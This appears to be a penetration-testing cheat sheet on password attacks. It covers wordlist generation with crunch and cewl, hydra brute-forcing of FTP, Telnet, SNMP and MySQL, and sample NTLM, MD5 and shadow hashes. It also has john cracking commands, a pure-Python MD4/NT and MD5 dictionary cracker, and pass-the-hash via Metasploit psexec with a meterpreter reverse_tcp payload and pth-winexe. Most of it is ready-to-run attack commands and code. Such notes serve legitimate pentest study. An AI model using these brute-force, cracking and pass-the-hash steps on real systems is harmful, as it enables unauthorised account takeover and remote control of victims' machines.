Hassan Saad

Password Attacks

Passwords Generation

Custom

# Basic syntax: crunch {min-len} {max-len} {character set} -o {output file}
crunch {min} {max} {characters} -o {outputFile}
# Every 4- to 6-character string over the hex digits
crunch 4 6 0123456789ABCDEF -o crunch1.txt
# Use a named character set (mixalpha = a-z plus A-Z) from the charset file shipped with crunch
crunch 6 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch2.txt

# Generate passwords matching a pattern (-t); the pattern length must equal both min and max
# ,  => upper-case letter
# @  => lower-case letter
# ^  => special character
# %  => digit
# Without -o the candidates are written to stdout, so pipe them or add -o {outputFile}
crunch 8 8 -t ,@@@@^%%
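The placeholder expansion behind `crunch -t`, as an added Python example that is not part of the original notes. It reproduces what the `crunch 8 8 -t ,@@@@^%%` line above does and also reports the keyspace size, which is worth checking before committing disk space or cracking time to a pattern. The character classes are assumptions: crunch's built-in special-character set is larger than the eight symbols used here, and literal characters in a pattern are kept as-is, as crunch does.

```python
"""crunch -t style pattern expansion (added example, not from the original notes)."""
import itertools
import string
from typing import Dict, Iterator, Optional

# Placeholder -> character class; the letters are the ones crunch uses with -t.
# The special-character set is a trimmed assumption, not crunch's full default set.
PLACEHOLDERS: Dict[str, str] = {
    ",": string.ascii_uppercase,  # upper-case letter
    "@": string.ascii_lowercase,  # lower-case letter
    "%": string.digits,           # digit
    "^": "!@#$%^&*",              # special character (assumed subset)
}


def keyspace_size(pattern: str) -> int:
    """Number of candidates the pattern expands to; a literal character counts as 1."""
    size = 1
    for ch in pattern:
        size *= len(PLACEHOLDERS.get(ch, ch))
    return size


def expand_pattern(pattern: str) -> Iterator[str]:
    """Yield every candidate for the pattern, keeping non-placeholder characters literally."""
    classes = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*classes):
        yield "".join(combo)


def write_wordlist(pattern: str, path: str, limit: Optional[int] = None) -> int:
    """Write candidates one per line (like crunch -o); return how many were written."""
    written = 0
    with open(path, "w", encoding="ascii") as fh:
        for candidate in expand_pattern(pattern):
            if limit is not None and written >= limit:
                break
            fh.write(candidate + "\n")
            written += 1
    return written


if __name__ == "__main__":
    pattern = ",@@@@^%%"
    print(f"{pattern!r} expands to {keyspace_size(pattern):,} candidates")
    # Literal text mixed with placeholders, e.g. a company name followed by four digits
    # (pattern constructed for the demo).
    for candidate in itertools.islice(expand_pattern("Acme%%%%"), 3):
        print(candidate)
```

Because the generator is lazy, piping `expand_pattern` straight into a cracker avoids materialising a multi-gigabyte file for patterns with a large keyspace.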

Profiling

# Build a target-specific wordlist by spidering a site: -d spider depth, -m minimum word length,
# --with-numbers keep words that contain digits, -v verbose, -w output file
cewl -d 1 -m 5 --with-numbers -v -w passcewl.txt https://www.google.com

Online Attack

# FTP: -L user list, -P password list, -t parallel connections per target, -V print every attempt
hydra -V -L users.txt -P pass.txt -t 20 192.168.1.104 ftp
# -e nsr adds three guesses per user: null (empty) password, the login as password, the login reversed
hydra -V -L users.txt -e nsr -t 20 192.168.100.31 ftp
hydra -V -L users.txt -P pass.txt -e nsr -t 20 192.168.100.31 ftp

# Telnet
hydra -V -L users.txt -P pass.txt -t 10 192.168.1.104 telnet

# SNMP: pass.txt holds candidate community strings (no user name needed)
hydra -V -P pass.txt 192.168.1.244 snmp

# MySQL
hydra -V -L users.txt -P pass.txt -t 10 192.168.1.104 mysql
# Try a single empty password (-p "") for every user
hydra -V -L users.txt -p "" -t 10 192.168.1.104 mysql

Offline Attack

Hash Examples

# Unsalted MD5, one user:hash per line
user1:827ccb0eea8a706c4c34a16891f84e7b
user2:e988532b766b8272ad0ee62911bffce4

# Windows NTLM & LM in pwdump format: user:RID:LM hash:NT hash:::
# aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string (LM storage disabled)
# 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:3a0842db8bfe9eddd03f8f5017348cc8:::
test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test123:1008:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
student123:1005:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Student:1000:AAD3B435B51404EEAAD3B435B51404EE:EAB4556003A83E179A149CE6583E097F:::
test1234:1001:aad3b435b51404eeaad3b435b51404ee:3b1b47e42e0463276e3ded6cef349f93:::

# Linux SHA-512 crypt ($6$) as stored in /etc/shadow: user:$6$salt$hash:last-change:min:max:warn:::
root:$6$.M0YwYN9$1grnLORHHShGJ5CnNS7gjMYAwPs7sDRdeMJ7HEUeuvgKEBdJ5VGYk866IRDHQE0bM.ou0qlGQhPpCzq46emjL0:17996:0:99999:7:::
test:$6$.Nyrlw0pwMxGTBwI$gQ4jC3D8v7ubCDuAIGsjGqmxLP2/0bC.3FFK2FDDTrZGLa3A7WRBPAHSD5gvz.IZ2wgtAijtiQ3r8hriTG79/.:18003:0:99999:7:::

Hash Cracking

# Linux crypt formats (identify the type by the hash prefix)
john --format=md5crypt hashes.txt    # $1$
john --format=sha256crypt hashes.txt # $5$
john --format=sha512crypt hashes.txt # $6$

# Windows hash formats (pwdump lines); LM is case-insensitive and split into two 7-character halves, so crack it first
john --format=LM hashes.txt # LM half
john --format=NT hashes.txt # NT half

# Plain unsalted MD5
john --format=raw-MD5 hashes.txt

# Crack using a custom wordlist (cracked results are kept in john.pot; rerun with --show to list them)
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-MD5 hashes.txt
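A dictionary attack against the sample hashes above, as an added Python example that is not code from the original notes. It reimplements the two unsalted hash types shown (raw MD5, and NT, which is MD4 over the UTF-16LE password) and runs a small wordlist against pwdump-style and `user:md5` lines. MD4 is written out in pure Python because hashlib's MD4 is usually unavailable under OpenSSL 3 without the legacy provider. The hash lines are copied from this page, plus one pwdump line constructed from the LM:NT pair used in the Pass The Hash section below (labelled as such in the code); the wordlist is constructed for the demo. john or hashcat are what you run at scale; the point here is to see why one hash computation per candidate tests every user at once when the hashes are unsalted.

```python
"""Wordlist attack on unsalted NT and MD5 hashes (added example, not from the original notes)."""
import hashlib
import struct
from typing import Callable, Dict, Iterable, List, Tuple

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320: three rounds of 16 steps per 64-byte block, little-endian words."""
    f = lambda x, y, z: (x & y) | (~x & z)           # round 1 mixing function
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)   # round 2 (majority)
    h = lambda x, y, z: x ^ y ^ z                     # round 3 (parity)
    bit_len = len(data) * 8
    # Padding: 0x80, zeros up to 56 mod 64, then the 64-bit little-endian bit length.
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(data), 64):
        w = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):
            a, b, c, d = d, _rotl((a + f(b, c, d) + w[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, _rotl((a + g(b, c, d) + w[r2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, _rotl((a + h(b, c, d) + w[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash: unsalted MD4 over the UTF-16LE password, as stored in the SAM and NTDS."""
    return md4(password.encode("utf-16le")).hex()


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def parse_pwdump(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """user:RID:LM:NT::: -> [(user, nt)], ignoring the LM half and malformed lines."""
    targets = []
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            targets.append((parts[0], parts[3].lower()))
    return targets


def parse_user_hash(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """user:hash -> [(user, hash)]"""
    return [(u, h.strip().lower()) for u, _, h in (l.partition(":") for l in lines) if h]


def crack(targets: List[Tuple[str, str]], wordlist: Iterable[str],
          hash_fn: Callable[[str], str]) -> Dict[str, str]:
    """Hash each candidate once and look it up against every pending target.
    With unsalted hashes, identical digests mean identical passwords, so they crack together."""
    pending: Dict[str, List[str]] = {}
    for user, digest in targets:
        pending.setdefault(digest, []).append(user)
    cracked: Dict[str, str] = {}
    for word in wordlist:
        for user in pending.pop(hash_fn(word), []):
            cracked[user] = word
        if not pending:
            break
    return cracked


# Hash lines from this page; the last pwdump line is constructed from the LM:NT pair
# that the Pass The Hash section below feeds to psexec.
PWDUMP_SAMPLE = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "test123:1008:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::",
    "Student:1000:AAD3B435B51404EEAAD3B435B51404EE:EAB4556003A83E179A149CE6583E097F:::",
    "pth-admin:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::",
]
MD5_SAMPLE = [
    "user1:827ccb0eea8a706c4c34a16891f84e7b",
    "user2:e988532b766b8272ad0ee62911bffce4",
]
WORDLIST = ["", "password", "12345", "Password1", "student", "admin123"]  # constructed mini wordlist


if __name__ == "__main__":
    for label, targets, fn in (("NT", parse_pwdump(PWDUMP_SAMPLE), nt_hash),
                               ("MD5", parse_user_hash(MD5_SAMPLE), md5_hex)):
        for user, pw in crack(targets, WORDLIST, fn).items():
            print(f"[{label}] {user}: {pw!r}")
```

The empty-password NT hash shows up repeatedly in the pwdump sample; a cracker that groups targets by digest, as `crack` does, resolves all of those accounts with a single MD4 computation, which is also why unsalted NT hashes fall so quickly to precomputed tables.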

Pass The Hash

# Metasploit: psexec accepts the LM:NT pair in place of a clear-text password
msfconsole
> use exploit/windows/smb/psexec
> set RHOSTS 192.168.57.131
> set SMBUser administrator
> set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.57.133
> set LPORT 4444
> exploit

# PTH with pth-winexe: -U user%LMhash:NThash; when only the NT hash is known, the LM half
# is the empty-password placeholder aad3b435b51404eeaad3b435b51404ee
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd